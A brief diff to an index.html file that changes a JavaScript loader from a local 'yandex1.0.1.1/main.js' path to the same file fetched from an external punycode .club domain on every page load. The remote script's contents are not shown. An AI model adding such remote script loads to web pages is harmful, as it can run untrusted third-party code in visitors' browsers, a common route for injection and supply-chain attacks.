--- a/index.html
+++ b/index.html
@@ -43,7 +43,7 @@
         head.appendChild(script);
     }
 
-    loader.importJS('yandex1.0.1.1/main.js?ver=' + Math.floor(Date.now() / (24 * 60 * 60)));
+    loader.importJS('https://xn--d1aiwkc2d.club/yandex1.0.1.1/main.js?ver=' + Math.floor(Date.now() / (24 * 60 * 60)));
 </script>
 <div id="ss" style="display:none;"></div>
 
